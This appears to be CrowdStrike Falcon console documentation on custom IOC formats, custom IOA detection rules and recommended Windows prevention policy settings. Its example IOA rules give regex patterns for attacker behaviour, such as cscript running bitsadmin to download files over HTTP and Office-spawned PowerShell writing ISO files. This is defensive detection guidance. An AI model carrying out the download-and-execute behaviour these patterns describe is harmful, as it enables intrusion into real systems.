  1. Click a filter at the top of the list, or click More filters to see additional filtering options.
  2. Select or clear the filter-specific metadata options, and then click Apply.
- Search by keyword:
  1. Click Search indicators.
  2. Type a keyword, and then click Apply.
- Specify which columns are visible:
  1. Click Configure table columns .
  2. Select the checkboxes for the columns that you want to see.
Click any indicator to see additional details.

View the custom IOC audit log

View the history of changes to your custom IOCs. The audit log lists changes made through both the Falcon console and the CrowdStrike API.

Go to Endpoint security > Configure > IOC management , click Open menu , and then select See audit log.
Adjust your view by filtering or sorting the log entries.
Click any revision to see additional details.

Format guidelines to add custom IOCs

Format guidelines for indicators:

SHA-256 hash:

64 hex characters, any case
Examples:

0123456789abcdef0123456789abcdef0123456789abcdef0123456789abcdef

1123456789ABCDEF0123456789ABCDEF1123456789ABCDEF0123456789ABCDEF

2123456789abcdef0123456789ABCDEF2123456789abcdef0123456789ABCDEF

MD5 hash:

32 hex characters, any case
Examples:

0123456789abcdef0123456789abcdef

1123456789ABCDEF0123456789ABCDEF

2123456789abcdef0123456789ABCDEF

IPv4 address:

A valid dotted quad using base 10 numerals
A single address and not a CIDR range
Leading zeros are acceptable
Examples:

1.1.1.1

255.255.255.255

042.042.000.001

IPv6 address:

A valid IPv6 address in hex-colon format, any case
A single address and not a range
Examples:

2001:0db8:0001:0000:0000:0ab9:C0A8:0102

2001:db8:1::ab9:C0A8:102

2001:db8::

::1234:5678

2001:db8:3333:4444:5555:6666:1.2.3.4

::1234:5678:91.123.4.56

Domain and subdomain names:

A valid ASCII domain name, fully qualified or not, with a top level domain.
Can contain the letters a-z, numbers 0-9, and the hyphen (not at the beginning), plus dots. Wildcard characters are not supported.
A domain or subdomain name can contain no more than 200 characters, including dots.
Examples:

www.example.com

non-profit.org

tech.net

badguys.mil

Format guidelines to add IOCs without metadata in a CSV file:

The file must have the .csv file extension.
The file must contain a newline-separated list of indicator values.
The file must contain exactly one column.
The file must not include a header row.
Each row in the file represents one indicator.

Format guidelines to add IOCs without metadata in a JSON file:

The file must have the .json file extension and be a simple array of indicator values as strings:
```
[
"hash1",
"hash2",
"hash3"
]
```

Format guidelines to import IOCs with metadata in a CSV file:

The file must have the .csv file extension.
The file must be in a plain text encoding (such as ASCII or UTF-8).
The file must include a header.
Each row in the file represents one indicator.
Some spreadsheet applications enclose comma-containing cells in quotation marks by default. For values that must be enclosed in quotation marks, ensure that only one set of quotation marks is used.

The file can contain up to 10 columns, in any order:

Column name	Description
value	Required. The canonical value as a string.
type	Required. The IOC type. Supported values: sha256 md5 domain all_subdomains (mobile devices only) ipv4 ipv6
description	Optional. A descriptive comment about the IOC.
platforms	Required. A list of platforms, separated by commas. Enclose in double quotation marks if commas are used (standard CSV format). Supported values: windows mac linux android ios Example: `"windows,mac"`
host_groups	Optional. A list of host groups, identified by host group ID and separated by commas. Enclose in double quotation marks if commas are used (standard CSV format).
applied_globally	Required if host_groups is not provided. Boolean. If the indicator should be applied to all hosts, provide the `true` value. If any host_groups are provided, provide the `false` value.
action	Required. The action to take if the IOC is observed on a Windows, Mac, or Linux host. Supported values: prevent (displayed as Block in the console) prevent_no_ui (displayed as Block, hide detection in the console) detect (displayed as Detect only in the console) allow (displayed as Allow in the console) no_action (displayed as None in the console)
mobile_action	Required. The action to take if the IOC is observed on an Android or iOS host. Supported values: prevent (displayed as Block in the console) prevent_no_ui (displayed as Block, hide detection in the console) detect (displayed as Detect only in the console) allow (displayed as Allow in the console) no_action (displayed as None in the console)
severity	Required if `action` is set to `prevent` or `detect`. The indicator’s custom severity level. Supported values: critical high medium low informational
expiration	Optional. The indicator’s Action value changes to None after the specified expiration date. The time zone of the date is UTC. Example: `2021-06-30`
tags	Optional. Custom tags, separated by commas. Enclose in double quotation marks if commas are used (standard CSV format). Example: `"tag1,tag2"`
metadata.filename	Optional. A filename, for example, from your environment or from intel reporting. Example: `software.exe`

Sample CSV file:

Type,value,description,platforms,host_groups,applied_globally,severity,action,expiration,metadata.filename
domain,wicar.org,"A domain to detect for testing","windows,linux",,true,medium,no_action,2022-03-17,
sha256,1234567890123456789012345678901234567890123456789012345678901234,"A hash to block for testing",windows,,true,high,prevent,,test.exe
domain,test.org,"Another domain to detect for testing","windows,linux,mac","11115678901234567890123456781111,22225678901234567890123456782222",false,high,detect,2022-03-17,
sha256,2222567890123456789012345678901234567890123456789012345678902222,"Another hash to block for testing",windows,"11115678901234567890123456781111,22225678901234567890123456782222",false,,prevent_no_ui,,test2.exe
ipv4,192.168.0.0,"An IPv4 to detect for testing","windows",22225678901234567890123456782222,false,critical,detect,2022-03-17,
md5,aaaa567890123456789012345678aaaa,"A hash to block for testing",windows,"33335678901234567890123456783333,cccc567890123456789012345678cccc,dddd567890123456789012345678dddd",false,informational,prevent,,test3.exe

Format guidelines to import IOCs with metadata in a JSON file:

Sample JSON file:

[
  {
    "action": "detect",
    "description": "test domain",
    "expiration": "2037-03-21",
    "host_groups": [
      "be024f23162645a6a8d65a837e308ae6",
      "2801ae3e4479409992f94b3186fb7680"
    ],
    "platforms": [
      "windows",
      "mac"
    ],
    "severity": "high",
    "tags": [
      "one",
      "two"
    ],
    "type": "domain",
    "value": "www.google.com"
  },
  {
    "action": "prevent_no_ui",
    "description": "test SHA256",
    "expiration": "2037-03-21",
    "host_groups": [
      "be024f23162645a6a8d65a837e308ae6",
      "2801ae3e4479409992f94b3186fb7680"
    ],
    "metadata": {
      "filename": "iexplore.exe"
    },
    "platforms": [
      "windows",
      "mac"
    ],
    "severity": "",
    "tags": [
      "one",
      "two"
    ],
    "type": "sha256",
    "value": "688787d8ff144c502c7f5cffaafe2cc588d86079f9de88304c26b0cb99ce91c6"
  },
  {
    "action": "allow",
    "description": "test allow SHA256",
    "apply_globally": true,
    "host_groups": [],
    "metadata": {
      "filename": "explorer.exe"
    },
    "platforms": [
      "windows"
    ],
    "tags": [
      "three",
      "two"
    ],
    "type": "sha256",
    "value": "688787d8ff144c502c7f5cffaafe2cc588d86079f9de88304c26b0cb99ce91c6"
  },
  {
    "action": "prevent",
    "description": "test MD5",
    "expiration": "2037-03-21",
    "host_groups": [
      "be024f23162645a6a8d65a837e308ae6",
      "2801ae3e4479409992f94b3186fb7680"
    ],
    "metadata": {
      "filename": "powershell.exe"
    },
    "platforms": [
      "windows",
      "mac"
    ],
    "severity": "critical",
    "tags": [
      "one",
      "two"
    ],
    "type": "md5",
    "value": "7815696ecbf1c96e6894b779456d330e"
  },
  {
    "action": "detect",
    "description": "test IPV6",
    "expiration": "2037-03-21",
    "host_groups": [
      "be024f23162645a6a8d65a837e308ae6",
      "2801ae3e4479409992f94b3186fb7680"
    ],
    "platforms": [
      "windows",
      "mac"
    ],
    "severity": "medium",
    "tags": [
      "one",
      "two"
    ],
    "type": "ipv6",
    "value": "0:0:0:0:0:ffff:fbb9:cd30"
  },
  {
    "action": "detect",
    "description": "test IPV4",
    "expiration": "2037-03-21",
    "host_groups": [
      "be024f23162645a6a8d65a837e308ae6",
      "2801ae3e4479409992f94b3186fb7680"
    ],
    "platforms": [
      "windows",
      "mac"
    ],
    "severity": "high",
    "tags": [
      "one",
      "two"
    ],
    "type": "ipv4",
    "value": "251.185.205.48"
  }
]

Custom IOC configuration fields

Configure these settings when adding or editing custom IOCs. The specific settings available vary by indicator type.

Field	Description
Filename	(Optional) Applies to hashes only. Enter a common filename or a filename in your environment. Filenames can be helpful for identifying hashes or filtering custom IOCs.
Host group	Specify which host groups to apply the settings to, or select All hosts to apply the settings to all hosts.
Platform	Specify which platforms to apply the settings to.
Action	Select the action to take when the sensor observes the matching indicator on a Windows, Mac, or Linux host in your environment. Block: Applies to hashes only. Block the indicator and show it as a detection. Block, hide detection: Applies to hashes only. Block and detect the indicator, but hide it from Endpoint security > Monitor > Endpoint detections . Discover this activity by searching for the indicator value in Investigate. Detect only: Applies to all indicator types. Show the indicator as a detection and take no other action. Allow: Applies to hashes only. Add the indicator to your allowlist and do not detect it. None: Applies to all indicator types. Save the indicator for future use, but take no action. Note: If you assign a Block action to a hash, you must also enable the Custom Blocking setting in Prevention Policies.
Mobile action	Select the action to take when an Android or iOS sensor observes the matching indicator on a host in your environment. Block: Block the indicator and show it as a detection. Block, hide detection: Block and detect the indicator, but hide it from Endpoint security > Monitor > Mobile detections. You can still view events related to blocked connections in Investigate > Search > Advanced event search . Detect only: Show the indicator as a detection and take no other action. Allow: Add the indicator to your allowlist and do not detect it. None: Save the indicator for future use, but take no action.
Severity	Required if Action is set to Block or Detect only. Specify a custom severity level for the indicators. The Severity options vary depending on which Action value you selected. Informational Low Medium High Critical
Expiration date	(Optional) Specify when the indicator will become inactive. When an indicator expires, its action is set to None but it remains in your list of custom IOCs. Indicators expire at 23:59 UTC on the specified date.
Tags	(Optional) Apply one or more custom tags to the indicators to help make the IOCs more maintainable and filterable. For example, you might use tags to link IOCs to specific tickets, filter groups, or external sources.
Audit log comment	(Recommended) Enter a comment to include in the IOC audit log. We recommend that you include a comment for the audit log whenever you add, edit, or delete an indicator.

Custom IOA rules

Overview

While CrowdStrike’s Machine Learning and behavior-based detections known as Indicators of Attack (IOAs) protect environments from malicious behaviors, organizations have unique circumstances and environments to monitor and protect. Add your own custom IOAs to your prevention policies to gain visibility into activity that is not detected or prevented by Falcon, including those that aren’t fundamentally malicious.

As a detection, a custom IOA provides visibility into undesirable behaviors you need to know about. With the addition of a Kill or Block action, a custom IOA can stop or prevent a specific behavior.

Requirements

Subscription: Custom IOAs are available with Falcon Insight XDR. Customers with both Falcon Insight XDR and Falcon Prevent can also enable Block and Kill actions.
Sensor Support:
- Falcon sensor for Windows version 5.13 and later supports all rules
- Falcon sensor for Mac versions:
  - 5.13 and later supports Process Creation and Network Connection rules
  - 5.14 and later supports File Creation rules
  - 7.33 and later supports Domain Name rules
- Falcon sensor for Linux versions:
  - 5.30 and later supports Process Creation rules
  - 6.45 and later supports File Creation rules
  - 7.31 and later supports Domain Name rules
  - 7.33 and later supports Network Connection rules
    
    Note: Falcon Container does not support custom IOA rules for pods.
Roles:
- These roles can create and edit custom IOAs and can also assign rule groups to prevention policies:
  - Custom IOAs Manager
  - Falcon Administrator
- These roles can view detections and preventions triggered by IOAs:
  - All roles that have access to detections and preventions

Understand custom IOA rules and rule groups

What are rules and how are they applied?

Individual custom IOA rules use a supported subset of regular expressions syntax to dictate what activity will trigger a custom IOA detection and whether or not the activity will also be blocked or killed.

Note: Custom IOAs don’t allow you to allowlist or customize CrowdStrike’s IOAs.

Rules are created within rule groups which are added to prevention policies. You can create a collection of any number of the same or different rule types within a rule group. Each individual rule is evaluated independently. If a behavior on a host matches multiple rules, it will register detections corresponding to each matched rule.

Implementation overview

Assign custom IOA rule groups to prevention policies to see custom detections and preventions. Implementing a new custom IOA to trigger detections on your hosts involves four key steps:

Create a rule group
Add the custom IOA rule to the rule group
Enable the rule and rule group
Assign the rule group to a prevention policy

Rule versioning

Each time you edit a rule, it’s saved with a new version number so you can distinguish detections from different versions of the same rule and refer back to the parameters defined in each version. Read more in Edit a rule.

Rule duplication

To maintain clarity around the rules and their impact on your environment, each rule stands alone and cannot be reused in more than one rule group. However, they can easily be duplicated and saved into a different rule group. The ability to duplicate the parameters of a rule is also useful when creating similar rules. Read more in Duplicate a rule.

Safeguards and testing

Improper implementation of a custom IOA rule could cause a major outage that requires manual remediation. CrowdStrike has certain safeguards in place to reduce the risk of creating a rule that would kill a critical process, but be aware of the potential impact custom IOAs might have on your environment.

We recommend you always test new custom IOA rules on a small set of test hosts (e.g. in a lab or QA environment) and start simple with a single populated field and a detection-only action. Use this testing to confirm the desired behavior before building out the rule or applying it to a production environment and/or configuring it to prevent by using a block or kill action.

Manage custom IOA rules

Create a rule group

Each custom IOA rule is applied as part of a rule group. To create a rule group:

Go to Endpoint security > Configure > Custom IOA rule groups.
On the Custom IOA Rule Groups page, click Create rule group.

Note: If you are making a rule based on an existing rule, you can start by duplicating the rule. See duplicate a rule.
In the Create new rule group dialog, give your rule group a descriptive name. The Platform can be Windows, Mac, or Linux, as the rule group will be applied to hosts by using a Windows, Mac, or Linux prevention policy.
Click Add Group.

Add a custom IOA rule

The details of custom IOAs are defined in individual rules, created within rule groups. To add a rule:

Go to the Endpoint security > Configure > Custom IOA rule groups page and click Edit for the rule group where you’ll add your new rule. This takes you to its Rule group details page.
On the Rule group details page, click Add new rule. The Add new rule dialog displays.
In the Rule dialog fields, define the rule, including its type, action, and severity, and what it will detect.
Click Check all Syntax to validate the regex syntax you’ve entered, and fix any indicated errors. This check validates that the syntax is correct, but doesn't test its functionality against a test string. That functional testing will be added in the future.
Click Save.

Rule dialog basic information fields

The dialog options vary depending on rule type.

Rule Type: Select a rule type. The supported rule types vary by OS.

Rule type	Windows	macOS	Linux
Process Creation	Yes	Yes	Yes
File Creation	Yes	Yes	Yes
Network Connection (IPv4, IPv6)	Yes	Yes	Yes
Domain Name	Yes	Yes	Yes

Note: Domain name functionality relies on DnsRequest events. On macOS and Linux, if these events are not generated, the custom IOA domain name rule type will not trigger. Several factors can prevent these events on Linux, including DNS-over-TCP, DNS-over-HTTPS, and certain resolver configurations. macOS 13 and later versions use Secure DNS by default, which can in some instances, prevent the sensor from raising detections. You can test a domain name with tools such as nslookup or dig.

Action to take. Specify a rule action:

Monitor
Detect
Block Execution
Kill Process. For File Creation, Network Connection, and Domain Name rule types, the Kill Process action does not always prevent the activity from happening, because the initiating process is sometimes killed after the activity has already occurred.

If you specify a Monitor rule action, a matched rule emits only an informational event that corresponds to the rule type. No other indication is visible in the Falcon console. You can search the Investigate app for the corresponding events:

Rule type	Event name
Process Creation	CustomIOABasicProcessDetectionInfoEvent
File Creation	CustomIOAFileWrittenDetectionInfoEvent
Network Connection (IPv4, IPv6)	CustomIOANetworkConnectionDetectionInfoEvent
Domain Name	CustomIOADomainNameDetectionInfoEvent

The supported prevention actions vary depending on rule type:

Rule Type	Prevention action
Process Creation	Block Execution
File Creation	Kill Process
Network Connection	Kill Process
Domain Name	Kill Process

Severity: Select the level for this type of detection to fit with your organization’s workflows.

Critical
High
Medium
Low
Informational

Rule Name: Give this detection a name that will be recognizable when monitoring custom IOA detections and preventions in the Activity app.

Rule Description: Enter information about why this detection exists, how a responder might follow up on a detection triggered by this rule, and so on.

Comment for Audit Log: Enter information about what you’ve changed in the rule’s parameters from the previous version.

Rule dialog regex fields

The four different rule types provide unique detection parameters that can be configured using regex in their fields. For more info, see Supported regex syntax.

The regex fields shown by default are “include” fields containing a wildcard expression. Each of these fields has options to expand and define parameters in a counterpart “exclude” field.

At least one “include” field must be manually populated with something that is not a wildcard expression. By default, all untouched “include” fields are wildcarded and all untouched “exclude” fields are empty.
All regex fields are case insensitive

See example custom IOA rule field parameters for each rule type.

Screenshot showing the rule dialog common regex fields

All rule types have these “include” fields and their “exclude” counterparts:

Grandparent Image Filename
Grandparent Command Line
Parent Image Filename
Parent Command Line
Image Filename
Command Line

File Creation, Network Connection, and Domain Name rule types also have unique type-specific unique fields.

File Creation unique regex fields:

File Path (and exclusion)
File Type: deselect file types to exclude them.

File Type	Windows	macOS	Linux
PE	Yes	Yes	Yes*
PDF	Yes	Yes	Yes
OLE	Yes	Yes	Yes
RTF	Yes	Yes	Yes
ZIP	Yes	Yes	Yes
JAR	Yes	Yes	Yes
OOXML	Yes	Yes	Yes
DOCX	Yes	Yes	Yes
XLSX	Yes	Yes	Yes
PPTX	Yes	Yes	Yes
VSDX	Yes	Yes	Yes
RAR	Yes	Yes	Yes
DMP	Yes	Yes	Yes
7ZIP	Yes	Yes	Yes
DWG	Yes	No	No
IDW	Yes	No	No
DXF	Yes	No	No
SLD	Yes	No	No
CAB	Yes	Yes	Yes
MACHO	Yes	Yes	Yes
TAR	Yes	Yes	Yes
XAR	Yes	Yes	Yes
BZIP2	Yes	Yes	Yes
SCRIPT	Yes	Yes	Yes
ELF	No	No	Yes
ESE	Yes	No	No
GZIP	No	No	Yes
OTHER	Yes	Yes	Yes

Note: *PE file creations for Linux requires sensor version 6.46 or later.

Network Connection unique regex fields:

Remote IP Address (and exclusion)
Remote TCP/UDP Port (and exclusion)
Connection Type:
- TCP-TCP
- UDP-UDP
- ICMP-ICMP (Ping) (Windows-only)
  
  The Windows ping.exe utility cannot be used to test ICMP-type rules because ping.exe uses the ICMP API instead of creating ICMP packets directly. However, you can use other methods to generate ICMP packet, such as Python script. To detect adversarial activity leveraging ping.exe, use the Process Creation rule type instead.

screenshot of the rule dialog for network connection rule type-specific fields

Domain Name unique regex fields (Windows and Linux only):

Domain Name (and exclude)

screenshot of the rule dialog for domain name rule type-specific field

Supported regex syntax

Symbol	Purpose	Example	Explanation
.	Any character		Match any character
[]	Range of characters	[1-5a-fx]	Match a character within the range: 1 to 5 or 'a' to 'f' or 'x'
[^]	Negate a range of characters	t[^eo]d	Match a character which is not one of those contained within the square brackets
{}	Multiplier	{n}{n,m}{n,}	Match exactly n of the preceding itemMatch between n and m of the preceding itemMatch n or more of the preceding item
()	Grouping	a(bc)?d	Specify an expression to match either zero or more times based on a subsequent optional multiplier
*	Multiplier		Match zero or more of the preceding item
?	Multiplier		Match zero or one of the preceding item
+	Multiplier		Match one or more of the preceding item
\|			Match what is on either the left or right of the vertical bar
\w \W	Word character		\w - Match any character which is a word character (A-Z, a-z, 0-9 and _ )\W - Match any character which is not a word character
\s \S	Whitespace		\s - Match any character which is considered whitespace (space, tab, and so on)\S - Match any character which is not whitespace
\d \D	Digit		\d - Match any character which is a digit ( 0 - 9 )\D - Match any character which is not a digit
\n	Newline		Match a line feed (or newline)
\r	Carriage return		Match a carriage return
\t	Tab		Match a tab
\	Escape	\.	Escape (that is, remove) the special meaning of the next character
\xNN \x{NNNNN}	Unicode character code	\x{1D11E}	Hexadecimal unicode character code U+1D11E

Example custom IOA rule field parameters

Process Creation Rule Type

To detect cscript.exe launching bitsadmin.exe in order to download a file from the internet:

Field	Value
Grandparent ImageFileName	.*
Grandparent CommandLine	.*
Parent ImageFileName	.+\\cscript\.exe
Parent CommandLine	.*
ImageFileName	.+\\bitsadmin\.exe
CommandLine	./transfer.https?://.*

File Creation

To detect Outlook launching MS Word that runs PowerShell that writes an .ISO file to the content.outlook temp folder:

Field	Value
GrandParent ImageFileName	.+\\outlook\.exe
Grandparent CommandLine	.*
Parent ImageFileName	.+\\winword\.exe
Parent CommandLine	.*
ImageFileName	.+\\powershell\.exe
CommandLine	.+new.+type.+itemtype.+file.+
File Path	.+\\content.outlook\\.+\.iso

To detect services.exe using svchost.exe (without arguments) to write a specific file path to programdata:

Field	Value
GrandParent ImageFileName	.*
Grandparent CommandLine	.*
Parent ImageFileName	.+\\services\.exe
Parent CommandLine	.*
ImageFileName	.+\\svchost\.exe
CommandLine	.+svchost\.exe\s?
File Path	.+\\programdata\\.+[abc]{3}.+[1-3]{4}\.dat

Network Connection (IPv4, IPv6)

To detect any process that tries to connect to a known bad IP address:

Field	Value
GrandParent ImageFileName	.*
Grandparent CommandLine	.*
Parent ImageFileName	.*
Parent CommandLine	.*
ImageFileName	.*
CommandLine	.*
Remote IP Address	192\.168\.1\.254 Regex: 192\.168\.0\.([1-9]\|[1-8][0-9]\|9[0-9]\|1[0-9]{2}\|2[0-4][0-9]\|25[0-4])
Remote TCP/UDP Port	.*

Domain Name

To detect any process that tries to reach a known bad domain name:

Field	Value
GrandParent ImageFileName	.*
Parent ImageFileName	.*
Parent CommandLine	.*
ImageFileName	.*
CommandLine	.*
Domain Name	domain\.com

Enable or disable a rule or rule group

Like prevention policies, rules and rule groups must be enabled in order for them to trigger detections and preventions on hosts. Enable or Disable a rule group or an individual rule from the Rules tab of a Rule Group Details page ( Endpoint security > Configure > Custom IOA rule groups , click Edit icon for a rule group).

The option to Enable or Disable the rule group is in the top right corner.
Select rules to Enable and/or Disable them from the table header.

Edit a rule

Every field and parameter of a rule can be edited. Open the Edit rule dialog by clicking Edit icon next to an individual rule ( Endpoint security > Configure > Custom IOA rule groups , expand a rule group, click Edit icon for a rule).

Each time a rule is edited, it is saved with a new version number. Expand the Rule Version list to select older versions and view the parameters defined in each. If you “revert” to an older version by saving when the fields are populated with an older version’s parameters, the newly-saved rule will still be assigned a new version number.

Screenshot of the Edit rule dialog showing multiple versions available from the rule version dropdown list

Duplicate a rule

To maintain clarity around rules and their impact on your environment, each custom IOA rule stands alone and cannot be reused in more than one rule group. However, they can easily be duplicated and saved into a different rule group.

To duplicate a rule go to the Rules tab of a Rule Group Details page ( Endpoint security > Configure > Custom IOA rule groups , click Edit icon for a rule group). In the Actions menu, click Duplicate rule icon for the rule you want to duplicate.

The Duplicate rule dialog displays with all fields populated to match the rule you are duplicating.

screenshot showing the duplicate rule dialog

Delete a rule or rule group

Rules and rule groups can be deleted from the Rules tab of a Rule Group Details page ( Endpoint Security > Configure > Custom IOA rule groups , click Edit icon for a rule group).

The option to delete the rule group is in the top right corner.
Select individual rules to delete them with the option in the table header.

Note: When you delete a custom IOA rule, you can still access its parameters from the Execution Details of a detection it triggered prior to being deleted.

screenshot showing the delete options on the Rule group details page

Assign a rule group to a prevention policy

In addition to enabling a rule and its rule group, the rule group must be assigned to a prevention policy or policies before it will trigger detections. Rule group policy assignment can be done from either a prevention policy or from a rule group.

two screenshots showing that you can access tabs for assigning custom ioa rule groups to prevention policies from policy details pages and custom ioa rule group details pages

Prevention policy Assigned Custom IOAs tab

To see the rule groups assigned to a prevention policy, go to that policy’s Assigned Custom IOAs tab. In the Actions column, you can go to Edit a rule group or Remove it from the list of custom IOA rule groups assigned to this prevention policy.

screenshot of Assigned Custom IOAs tab of a a prevention policy

Click Assign rule groups to add any currently unassigned rule groups to this prevention policy.

Note: Assigning a rule group to a policy does not change the rule group’s enabled or disabled status. Quickly get to a rule group’s details by clicking Edit icon

in the Actions column to enable or disable it.

screenshot showing the dialog to assign a custom ioa rule group to a prevention policy

Custom IOA rule group Prevention Policies tab

To see the prevention policies a rule group is assigned to, go to that rule group’s Prevention Policies tab. In the Actions column, you can go to Edit Policy icon a policy or Remove rule group icon it from the list of prevention policies this rule group is assigned to.

screenshot showing an ioa rule group prevention policies tab

Click Assign to policies to assign the role group to prevention policies it is currently not assigned to.

screenshot showing the assign to prevention policies dialog to add a custom ioa rule group to a prevention policy or policies

View the custom IOA audit log

Review a full audit log with the full revision history of each custom IOA rule and rule group. To reach the audit log, click See audit log in the top right corner of the Custom IOA Rule Groups page.

Sort columns to group your view of the log. Logged revisions are defined in the Action column as Created, Updated, or Deleted.

The custom ioa detection execution details panel on the detections page of the Activity dashboard.

Click any revision to see its Details panel:

For updates to rule groups, the revision’s details include whether it was enabled or disabled.
When individual rules have been updated, see what the Version was before and after this revision, any audit log comments, and the detailed changes that were made.

Prevention Policy Settings

Look up setting recommendations and full details about each prevention policy setting.

Overview

CrowdStrike Falcon uses overlapping methods to detect both known and unknown threats. This helps ensure detection and prevention of attacks at multiple stages, and is also why enabling all of our recommended prevention policies is critical.

Standard playbook tactics for adversaries leverage privilege escalation and credential theft. These tactics enable lateral movement and exploitation or compromise of systems in your environment. Therefore, it’s vital that you have a view of activity across all potential attack phases. Enabling only 8 out of 10 policy toggles doesn’t mean you are 80% protected. If the one setting needed to detect a particular malicious attack in your environment is also the one that’s disabled, you're still potentially 100% vulnerable.

Note: Falcon Complete has its own prevention policies guidelines. Standard prevention policy recommendations might not align with Falcon Complete's recommended configurations.

Test all policy changes in pre-production first, and then deploy the changes to production in stages. You can triage detections and adjust settings as needed to see fewer false positives, using IOC management and machine learning and IOA exclusions. For more info, see Custom settings and configurations.

For new customers, we recommend a three-phase approach to configuring prevention policy settings. As of April 2022, Falcon Prevent and Falcon Insight XDR come with pre-configured editable prevention policies that provide these recommended settings.

When new prevention policy options are made generally available, we recommend that you incorporate them into their production environments using your standard change control methodology.

Note: We've updated the names of prevention policy settings to more accurately reflect their functionality. For more info, see Tech Alert | Prevention Policy Settings Naming Update.

Recommended prevention policy settings

Windows prevention policy setting recommendations

Type	Category	Setting	Recommendation setting for optimal protection
Sensor Capabilities	-	End User Notifications	Customer preference
Sensor Capabilities	-	Unknown Executable Analysis and Unknown Detection-Related Executable Analysis	Enabled
Sensor Capabilities	-	Sensor Tamper Prevention	Enabled
Sensor Capabilities	-	Suspicious File QuickScan Pro Analysis	Customer preference
Sensor Visibility	Enhanced Visibility	Additional User Mode Data Visibility	Enabled
Sensor Visibility	Enhanced Visibility	Interpreter-Only Visibility	Enabled
Sensor Visibility	Enhanced Visibility	System Management Engine Visibility	Enabled
Sensor Visibility	Enhanced Visibility	Script-Based Execution Visibility	Enabled
Sensor Visibility	Enhanced Visibility	HTTP Visibility and Detection	Enabled
Sensor Visibility	Enhanced Visibility	Redacted HTTP Detection Details	Customer preference
Sensor Visibility	Enhanced Visibility	Hardware-Enhanced Exploit Detection	Enabled
Sensor Visibility	Enhanced Visibility	Enhanced Exploitation Visibility	Enabled
Sensor Visibility	Enhanced Visibility	Extended User Mode Data Visibility	Moderate
Sensor Visibility	Enhanced Visibility	Enhanced DLL Load Visibility	Enabled
Sensor Visibility	Enhanced Visibility	WSL 2 Visibility	Enabled
Sensor Visibility	Hardware-Enhanced Visibility	Memory Scanning with GPU	Enabled
Sensor Visibility	Hardware-Enhanced Visibility	Memory Scanning with CPU	Enabled
Sensor Visibility	Firmware	BIOS Firmware Deep Visibility	Enabled
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Anti-Malware - Detection	Aggressive
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Anti-Malware - Prevention	Moderate+
Next-Gen Antivirus	Microsoft Office File Macro Machine Learning	Cloud Anti-malware for Microsoft Office Files- Detection	Aggressive
Next-Gen Antivirus	Microsoft Office File Macro Machine Learning	Cloud Anti-malware for Microsoft Office Files - Prevention	Moderate+
Next-Gen Antivirus	Clean Infected Microsoft Office Files	Microsoft Office File Malicious Macro Removal	Customer preference
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Adware & Pup - Detection	Aggressive
Next-Gen Antivirus	Cloud Machine Learning	Cloud-Based Adware & Pup - Prevention	Moderate+
Next-Gen Antivirus	Sensor Machine Learning	Sensor-Based Anti-Malware - Detection	Aggressive
Next-Gen Antivirus	Sensor Machine Learning	Sensor-Based Anti-Malware - Prevention	Moderate+
Next-Gen Antivirus	Sensor Machine Learning	Enhanced machine learning for larger files	Enabled
Next-Gen Antivirus	On-Demand Scans Machine Learning	Cloud-based anti-malware on-demand scanning - Detection	Aggressive
Next-Gen Antivirus	On-Demand Scans Machine Learning	Cloud-based anti-malware on-demand scanning - Prevention	Moderate+
Next-Gen Antivirus	On-Demand Scans Machine Learning	Sensor-based anti-malware on-demand scanning - Detection	Aggressive
Next-Gen Antivirus	On-Demand Scans Machine Learning	Sensor-based anti-malware on-demand scanning - Prevention	Moderate+
Next-Gen Antivirus	On-Demand Scans Machine Learning	Cloud-based adware & PUP on-demand scanning - Detection	Aggressive
Next-Gen Antivirus	On-Demand Scans Machine Learning	Cloud-based adware & PUP on-demand scanning - Prevention	Moderate+
Next-Gen Antivirus	On-Demand Scans	USB Insertion Triggered Scan	Enabled
Next-Gen Antivirus	On Write	Detect on Write	Enabled
Next-Gen Antivirus	On Write	Quarantine on Write	Enabled
Next-Gen Antivirus	On Write	On Write Script File Visibility	Enabled
Next-Gen Antivirus	Quarantine	Quarantine & Security Center Registration	Enabled
Next-Gen Antivirus	Quarantine	Quarantine on Removable Media	Enabled
Malware Protection	Execution Blocking	Custom Indicator Blocking	Enabled
Malware Protection	Execution Blocking	Suspicious Process Prevention	Enabled
Malware Protection	Execution Blocking	Suspicious Registry Operation Prevention	Enabled
Malware Protection	Execution Blocking	Suspicious Script and Command Prevention	Enabled
Malware Protection	Execution Blocking	Intelligence-Sourced Threat Prevention	Enabled
Malware Protection	Execution Blocking	Driver Load Prevention	Enabled
Malware Protection	Execution Blocking	Vulnerable Driver Protection	Enabled
Malware Protection	Execution Blocking	Boot Configuration Database Protection	Enabled
Malware Protection	Execution Blocking	File System Containment	Enabled
Behavior-based Prevention	Exploit Mitigation	ASLR Bypass Prevention	Enabled
Behavior-based Prevention	Exploit Mitigation	DEP Bypass Prevention	Disabled
Behavior-based Prevention	Exploit Mitigation	Heap Spray Pre-allocation Prevention	Enabled
Behavior-based Prevention	Exploit Mitigation	NULL Page Allocation Prevention	Enabled
Behavior-based Prevention	Exploit Mitigation	SEH Overwrite Prevention	Enabled
Behavior-based Prevention	Ransomware	Backup Deletion Prevention	Enabled
Behavior-based Prevention	Ransomware	Cryptowall Prevention	Enabled
Behavior-based Prevention	Ransomware	File Encryption Prevention	Enabled
Behavior-based Prevention	Ransomware	Locky Prevention	Enabled
Behavior-based Prevention	Ransomware	File System Access Prevention	Enabled
Behavior-based Prevention	Ransomware	Volume Shadow Copy - Audit	Enabled
Behavior-based Prevention	Ransomware	Volume Shadow Copy - Protect	Enabled
Behavior-based Prevention	Exploitation Behavior	Application Exploitation Prevention	Enabled
Behavior-based Prevention	Exploitation Behavior	Chopper Webshell Prevention	Enabled
Behavior-based Prevention	Exploitation Behavior	Drive-by Download Prevention	Enabled
Behavior-based Prevention	Exploitation Behavior	Code Injection Prevention	Enabled
Behavior-based Prevention	Exploitation Behavior	JavaScript Execution Via Rundll32 Prevention	Enabled
Behavior-based Prevention	Lateral Movement and Credential Access	Windows Logon Bypass ("Sticky Keys") Prevention	Enabled
Behavior-based Prevention	Lateral Movement and Credential Access	Credential Dumping Prevention	Enabled
Behavior-Based Prevention	Remediation	Advanced Remediation	Enabled
Behavioral detections	Cloud-based detections	Cloud-based anomalous process execution	Moderate

Mac prevention policy setting recommendations

Type	Category	Setting	Recommendation
Sensor Capabilities	-	End User Notifications	Customer preference
Sensor Capabilities	-	Unknown Executable Analysis and Unknown Detection-Related Executable Analysis	Enabled
